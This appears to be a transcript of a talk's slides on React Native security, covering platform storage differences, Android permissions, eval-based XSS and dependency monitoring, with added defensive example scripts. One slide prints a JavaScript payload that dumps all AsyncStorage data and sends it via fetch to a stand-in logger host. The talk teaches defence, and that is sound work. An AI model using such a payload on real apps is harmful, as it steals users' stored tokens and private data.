
React Native Security


Julia Potapenko

December 05, 2020

Transcript

  1. React Native Security: Addressing Typical Mistakes. Julia Potapenko

  2. About me: Security Software Engineer at Cossack Labs. We help companies to protect their sensitive and valuable data. @julepka
  3. We will talk about: Architecture, Platforms usage, Dependencies

  4. “Choosing React Native and its components means that you understand and accept potential security consequences.”
  5. Architecture basics: React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

  8. Trusting third parties: Apple and Google are must-haves. Add Facebook to the list. CVE-2020-1911, CVE-2020-1912, CVE-2020-1913
  9. “Working with React Native, developers deal with security for all three platforms: iOS, Android and React Native.”

  10. OWASP Mobile Top 10 #1: Improper platform usage

  11. React Native is a leaky abstraction (@vixentael)
  13. Secure Store Example

      | Property                          | iOS (Keychain)                 | Android (SharedPreferences + KeyStore) |
      |-----------------------------------|--------------------------------|----------------------------------------|
      | Data stored encrypted             | Yes                            | Yes                                    |
      | Data persists across app reinstalls | Yes                          | No                                     |
      | Hardware-backed encryption        | Yes                            | Depends on device vendor               |
      | Data decrypted only before usage  | Decrypted when device unlocked | Yes                                    |
  17. Managing Android Permissions. Android: you can add permissions in multiple files + React Native: it is common practice to use third-party solutions = “I don’t need this permission” / “The app crashes if I delete it”
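The slide's point is that a permission in the final APK may come from a dependency's own AndroidManifest.xml rather than from the app's manifest, which is why deleting it from the app manifest changes nothing and deleting it from the wrong place crashes the app. The script below is an added example, not code from the talk: it scans a set of manifests (constructed samples under hypothetical paths) and reports, for every `uses-permission`, which files request it and which permissions are requested only by third-party code.

```javascript
// Added example (not from the talk): list Android permissions declared across
// several AndroidManifest.xml files and which file requests each one. Manifests
// from native modules under node_modules are merged into the final app manifest,
// so a permission can come from a dependency rather than from your own manifest.

// Constructed sample manifests keyed by a hypothetical path.
const MANIFESTS = {
  'android/app/src/main/AndroidManifest.xml': `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.INTERNET" />
    </manifest>`,
  'node_modules/some-camera-lib/android/src/main/AndroidManifest.xml': `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.CAMERA"/>
      <uses-permission android:name="android.permission.RECORD_AUDIO" />
    </manifest>`,
  'node_modules/some-analytics-lib/android/src/main/AndroidManifest.xml': `
    <manifest xmlns:android="http://schemas.android.com/apk/res/android">
      <uses-permission android:name="android.permission.INTERNET" />
      <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    </manifest>`,
};

// Matches <uses-permission ...> and <uses-permission-sdk-23 ...> elements.
const USES_PERMISSION = /<uses-permission(?:-sdk-23)?\b[^>]*android:name="([^"]+)"/g;

// Returns { permission: [paths...] }, sorted by permission name.
function permissionSources(manifests) {
  const result = {};
  for (const [path, xml] of Object.entries(manifests)) {
    for (const match of xml.matchAll(USES_PERMISSION)) {
      const name = match[1];
      (result[name] = result[name] || []).push(path);
    }
  }
  return Object.fromEntries(
    Object.entries(result).sort(([a], [b]) => a.localeCompare(b))
  );
}

// Permissions that only third-party code asks for: review these (and record why
// the app needs them) before deleting them and watching the app crash.
function thirdPartyOnly(sources) {
  return Object.entries(sources)
    .filter(([, paths]) => paths.every((p) => p.startsWith('node_modules/')))
    .map(([name]) => name);
}

// Usage: node this_file.js
console.log(permissionSources(MANIFESTS));
console.log('third-party only:', thirdPartyOnly(permissionSources(MANIFESTS)));
```

In a real project the `MANIFESTS` object would be filled by walking `android/` and `node_modules/*/android/` for `AndroidManifest.xml` files; the parsing and reporting logic stays the same.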
  19. Is XSS possible? XSS possibility is decreased by design. XSS is still possible: eval()
      _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch('http://example.com/logger.php?token='+JSON.stringify(result));});});
      Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs
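The slide shows that once a string reaches eval(), it runs with the same access to the JavaScript environment as the app itself. The example below is added here and is not code from the talk: it puts the eval-based pattern next to its hardened form for one common case, loading a configuration string from a remote source. The config keys and the sample inputs are constructed for the example.

```javascript
// Added example (not from the talk): a remote config string is handled two ways.
// The vulnerable path uses eval(), so any string that is not pure data becomes
// code running with access to the app's globals (AsyncStorage, fetch, ...).
// The hardened path uses JSON.parse() plus an allow-list of expected keys, so
// the same input is either plain data or a rejected parse error.

const ALLOWED_KEYS = new Set(['theme', 'refreshSeconds']); // hypothetical config schema

// Vulnerable: treats the server response as JavaScript source.
function loadConfigUnsafe(text) {
  // eslint-disable-next-line no-eval
  return eval('(' + text + ')');
}

// Hardened: treats the response as data only, then validates shape and types.
function loadConfigSafe(text) {
  let parsed;
  try {
    parsed = JSON.parse(text);
  } catch (e) {
    return { ok: false, reason: 'not valid JSON' };
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    return { ok: false, reason: 'config must be a JSON object' };
  }
  const unknown = Object.keys(parsed).filter((k) => !ALLOWED_KEYS.has(k));
  if (unknown.length > 0) {
    return { ok: false, reason: 'unexpected keys: ' + unknown.join(',') };
  }
  if ('refreshSeconds' in parsed && !Number.isInteger(parsed.refreshSeconds)) {
    return { ok: false, reason: 'refreshSeconds must be an integer' };
  }
  return { ok: true, config: parsed };
}

// Constructed inputs: an honest config, and one that is valid JavaScript but not
// JSON and carries a side effect (a harmless global assignment stands in for the
// AsyncStorage exfiltration on the slide).
const HONEST = '{"theme": "dark", "refreshSeconds": 30}';
const HOSTILE = '{ theme: "dark", refreshSeconds: (globalThis.sideEffect = "ran", 30) }';

// Runs both paths on HOSTILE and reports whether the side effect executed.
function demo() {
  globalThis.sideEffect = 'not run';
  loadConfigUnsafe(HOSTILE);                 // the side effect executes
  const unsafeRan = globalThis.sideEffect === 'ran';
  globalThis.sideEffect = 'not run';
  const safe = loadConfigSafe(HOSTILE);      // rejected, nothing executes
  const safeRan = globalThis.sideEffect === 'ran';
  return { unsafeRan, safeRan, safeResult: safe, honest: loadConfigSafe(HONEST) };
}

console.log(demo());
```

The same rule applies to anything else that turns strings into code in a React Native bundle (`new Function`, `setTimeout` with a string argument, injecting user data into WebView `injectedJavaScript`): keep untrusted input on the data side of that boundary and validate it there.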
  20. Apart from Source Code: Annual BIS Reports (US encryption export regulations), Apple privacy rules, User acknowledgement about private data usage

  21. “50 shades of dependencies”

  23. A typical day for React Native app developer (It is a joke)

  26. Monitoring dependencies
      So many dependencies
      Additional CI work
      One update triggers another update
      Integrating dependency checkers
      Updates may be incompatible
      What if there is no fix for a vulnerability?
  28. What if there is no fix?
      ✅ Learn more about the issue, its scope
      ✅ Document it, make the team aware
      ✅ Monitor it and book the time for the update
      React Native requires the team to plan time more carefully
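The three steps on the slide (learn the scope, document it, monitor it) are easier to keep up with when the dependency checker output is turned into a tracking list that separates "just update" from "major update, plan time" from "no fix yet". The script below is an added example, not code from the talk: it consumes a report in the shape of `npm audit --json` as the author of this example understands the npm 7+ format (vulnerabilities keyed by package, each with `severity`, `isDirect`, `via` and `fixAvailable`), using constructed package names and advisories rather than real ones.

```javascript
// Added example (not from the talk): triage an `npm audit --json` style report
// into a short tracking list. The report shape is assumed from the npm 7+ format;
// every package, title and URL below is constructed sample data.

const SAMPLE_AUDIT = {
  vulnerabilities: {
    'example-parser': {
      name: 'example-parser', severity: 'high', isDirect: false,
      via: [{ title: 'Prototype pollution (constructed)', url: 'https://example.invalid/advisory/1' }],
      fixAvailable: true,
    },
    'example-image-lib': {
      name: 'example-image-lib', severity: 'moderate', isDirect: true,
      via: [{ title: 'Denial of service (constructed)', url: 'https://example.invalid/advisory/2' }],
      fixAvailable: { name: 'example-image-lib', version: '4.0.0', isSemVerMajor: true },
    },
    'example-native-bridge': {
      name: 'example-native-bridge', severity: 'critical', isDirect: true,
      via: [{ title: 'Arbitrary file read (constructed)', url: 'https://example.invalid/advisory/3' }],
      fixAvailable: false,
    },
  },
};

const SEVERITY_ORDER = { critical: 0, high: 1, moderate: 2, low: 3, info: 4 };

// fixAvailable is true, false, or an object naming the version that fixes it
// (with isSemVerMajor set when that version is a breaking upgrade).
function fixPlan(fixAvailable) {
  if (fixAvailable === true) return 'update';
  if (fixAvailable && fixAvailable.isSemVerMajor) return 'plan major update to ' + fixAvailable.version;
  if (fixAvailable) return 'update to ' + fixAvailable.version;
  return 'no fix: document scope, monitor, book time';
}

// Returns one entry per vulnerable package, most severe first.
function triage(report) {
  return Object.values(report.vulnerabilities)
    .map((v) => ({
      package: v.name,
      severity: v.severity,
      direct: Boolean(v.isDirect),
      // `via` mixes advisory objects with plain strings naming a vulnerable dependency.
      advisories: v.via.filter((x) => typeof x === 'object').map((x) => x.title),
      action: fixPlan(v.fixAvailable),
    }))
    .sort((a, b) => (SEVERITY_ORDER[a.severity] ?? 9) - (SEVERITY_ORDER[b.severity] ?? 9));
}

// Usage: node this_file.js   (or feed it JSON.parse(fs.readFileSync('audit.json')))
console.table(triage(SAMPLE_AUDIT));
```

Entries whose action is "no fix" are the ones the slide is about: they go into the team's issue tracker with the scope written down, and the list is regenerated on every CI run so a newly published fix shows up as a change of action rather than being noticed by chance.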
  29. React Native requires the team to plan time more carefully: iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

  30. Final Thoughts: “Learn once, write anywhere.” “Learn once, ask mobile security people for help.”

  31. Where to go next: My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html and the React Native Security Guide https://reactnative.dev/docs/security

  32. Thank You! @julepka